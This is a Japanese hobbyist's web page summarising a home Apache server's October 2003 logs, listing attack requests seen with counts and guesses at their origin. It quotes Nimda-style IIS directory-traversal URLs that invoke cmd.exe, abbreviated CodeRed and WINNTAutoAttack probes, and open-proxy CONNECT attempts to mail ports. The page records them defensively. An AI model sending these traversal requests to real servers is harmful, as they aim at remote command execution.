楽しみながら攻めつづける!
−HONDA '88NSR250R & '94NSR250R SE−

[検索方法]
 
山下の部屋 自宅サーバのログを見てみよう
お薦めコンテンツ 楽しみながら攻めつづける!
Apacheのログウォッチ 2003年10月1日〜2003年10月31日
 
 自宅Webサーバのログ集計です。今回は10月分の1ヶ月です。
前回無くなった?っと思っていた、「WINNTAutoAttack」からのアタックがまた復活してました(謎)。他には特に目新しい感じは無かったです。
 
 今までもっとも多かった「CodeRed」からのアタックが急に減ってました、そろそろ沈静化されつつあるのでしょうかね。なんちゃってコラムをWebサーバから削除していたのですが、思いの外にアクセスが有ったようで、そっちの方がビックリです(検索エンジン経由で来たのかな??)。
 
400:Bad Request
Method URL Query 回数 理由
GET /NULL.IDA CCC〜(略)〜\xffVcmd.exe$ 17 WINNTAutoAttack V2.5というアタックツールからの攻撃らしい
GET /scripts/..%%35%63../winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%%35c./winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
 
404:Not Found
Method URL Query 回数 理由
GET /_vti_bin/owssvr.dll UL=1&〜(略)〜&CAPREQ=0 46 IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET /MSOffice/cltreq.asp UL=1&〜(略)〜&CAPREQ=0 46 IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET /column/ディレクトリなど - 30 コラムはネタが無いので、サーバ上から削除したんですよ(汗)
GET /scripts/nsiislog.dll - 8 Windows Mediaサービスに対する ISAPI 拡張欠陥による IIS サービス拒否攻撃
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /c/winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /d/winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /MSADC/root.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%25%35%63../winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%252f../winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c0%2f../winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 7 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%255c%255c../winnt/system32/cmd.exe /c+dir 2 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /default.ida XXXX〜(途中略)〜%u00=a 1 「CodeRed」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe /c+dir+c:\\ 1 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ?新しい亜種かな??
GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 1 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ?新しい亜種かな??
GET /NULL.printer - 1
 
405:Method Not Allowed
Method URL Query 回数 理由
POST http://162.84.223.118:25/ - 1 POST?
POST http://67.202.109.119:25/ - 1 POST?
CONNECT 207.217.120.23:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
CONNECT 65.54.167.230:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
CONNECT aibo.runbox.com:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
CONNECT http://162.84.223.118:25/ - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
CONNECT http://67.202.109.119:25/ - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
 
501:Not Implemented
Method URL Query 回数 理由
SEARCH / - 4
\x04\x01   - 2 AN HTTPDのセキュリティホールをつく攻撃みたい
\x05\x01   - 2 AN HTTPDのセキュリティホールをつく攻撃みたい
 
 
BACK TOP PAGE